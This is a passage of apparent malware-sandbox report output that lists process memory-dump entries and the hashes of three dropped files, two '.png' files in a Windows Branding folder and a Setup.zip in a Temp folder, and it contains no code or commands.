memory/1784-318-0x0000015FFD9D3000-0x0000015FFD9D5000-memory.dmp
memory/1784-319-0x0000015FFD9D6000-0x0000015FFD9D8000-memory.dmp
memory/1784-328-0x0000015FFD9D8000-0x0000015FFD9DA000-memory.dmp
memory/4272-338-0x0000000000000000-mapping.dmp
memory/4292-339-0x0000000000000000-mapping.dmp
memory/4312-340-0x0000000000000000-mapping.dmp
memory/4496-377-0x0000000000000000-mapping.dmp
memory/4516-378-0x0000000000000000-mapping.dmp
memory/4548-381-0x0000000000000000-mapping.dmp
memory/4564-382-0x0000000000000000-mapping.dmp
memory/4580-383-0x0000000000000000-mapping.dmp
memory/4600-384-0x0000000000000000-mapping.dmp
memory/4620-385-0x0000000000000000-mapping.dmp
memory/4636-386-0x0000000000000000-mapping.dmp
memory/4652-387-0x0000000000000000-mapping.dmp
memory/4672-388-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/4780-391-0x0000000000000000-mapping.dmp
memory/4800-392-0x0000000000000000-mapping.dmp
memory/4860-393-0x0000000000000000-mapping.dmp
memory/4880-394-0x0000000000000000-mapping.dmp
memory/4940-395-0x0000000000000000-mapping.dmp
memory/4960-396-0x0000000000000000-mapping.dmp
memory/5020-397-0x0000000000000000-mapping.dmp
memory/5040-398-0x0000000000000000-mapping.dmp
memory/5100-399-0x0000000000000000-mapping.dmp
memory/4100-400-0x0000000000000000-mapping.dmp
memory/1536-401-0x0000000000000000-mapping.dmp
memory/2008-402-0x0000000000000000-mapping.dmp
memory/4180-403-0x0000000000000000-mapping.dmp
memory/2252-404-0x0000000000000000-mapping.dmp
memory/4296-405-0x0000000000000000-mapping.dmp
memory/4292-406-0x0000000000000000-mapping.dmp
memory/4292-420-0x000001EBE9250000-0x000001EBE9252000-memory.dmp
memory/4292-421-0x000001EBE9253000-0x000001EBE9255000-memory.dmp
memory/4292-425-0x000001EBE9256000-0x000001EBE9258000-memory.dmp
memory/4292-477-0x000001EBE9258000-0x000001EBE9259000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Setup.zip
| MD5 | 36f178576dcb8db35d6f06448b1eb510 |
| SHA1 | 62277c90cc2b1bb81b36571037afe5081b0605d5 |
| SHA256 | 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a |
| SHA512 | 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96 |
memory/4956-491-0x0000000000000000-mapping.dmp
memory/4928-492-0x0000000000000000-mapping.dmp